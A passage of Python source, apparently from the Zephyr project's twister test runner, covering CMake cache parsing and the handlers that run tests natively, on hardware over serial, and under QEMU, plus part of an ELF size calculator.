logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
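    # For example (illustrative), the line 'FOO:STRING=a;b;c' is parsed into
    # CMakeCacheEntry(name='FOO', value=['a', 'b', 'c']), while 'BAR:BOOL=ON'
    # is converted to a truthy value via _to_bool().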
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
        # Encapsulate the terminate functionality so we do it consistently wherever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of how both newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer ninja versions don't seem to pass SIGTERM down to the
        # children, so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
        If test suite names were found in the test's C source code, verify that
        the suite names detected in the output correspond to the expected suite
        names (and not the reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
        Change the result of the performed test if a problem with a missing or
        improper suite name occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
        self.instance.reason = "Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
        # FIXME: This is needed when killing the simulator: the console is
        # garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
# ignore SerialException which may happen during the serial device
# power off/on process.
except serial.SerialException:
pass
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
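            # Illustrative example (assumed values): --west-flash="--board-id=42,--erase"
            # together with the pyocd runner results in roughly:
            #   west flash --skip-rebuild -d <build_dir> --runner pyocd -- --board-id=42 --erase --board-id <board_id>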
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
            # Receive parameters from a runner_params field
            # of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
        # Sometimes a test instance is not executed successfully and ends up with
        # no status; fill the results in as blocked so that it is still included
        # in the final report.
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self.instance.status = "error"
self.instance.reason = "No Console Output(Timeout)"
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
    Test cases emit special messages to the console as they run; we check
    for these to determine whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
        # Disable internal buffering; we don't want read() or poll() to ever
        # block if there is data available.
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                        # There's a possibility we polled nothing because the
                        # host did not schedule enough CPU time for the QEMU
                        # process during p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
                # If we get some state, that means the test is doing well; reset
                # the timeout and wait for 2 more seconds to catch anything
                # printed late. We wait much longer if code coverage is enabled
                # since dumping this information can take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
        if pid:
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass
os.unlink(fifo_in)
os.unlink(fifo_out)
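    # The character-by-character FIFO read above boils down to the following
    # pattern; this is only an illustrative sketch with a hypothetical path,
    # not a replacement for _thread():
    #
    #     import select
    #     in_fp = open("/tmp/qemu-fifo.out", "rb", buffering=0)
    #     poller = select.poll()
    #     poller.register(in_fp, select.POLLIN)
    #     if poller.poll(1000):        # wait up to 1000 ms for output
    #         byte = in_fp.read(1)     # safe to read once poll() reports data
    #
    # Unbuffered reads matter here: with buffering enabled, poll() could report
    # no pending data while bytes already sit in Python's internal buffer.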
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
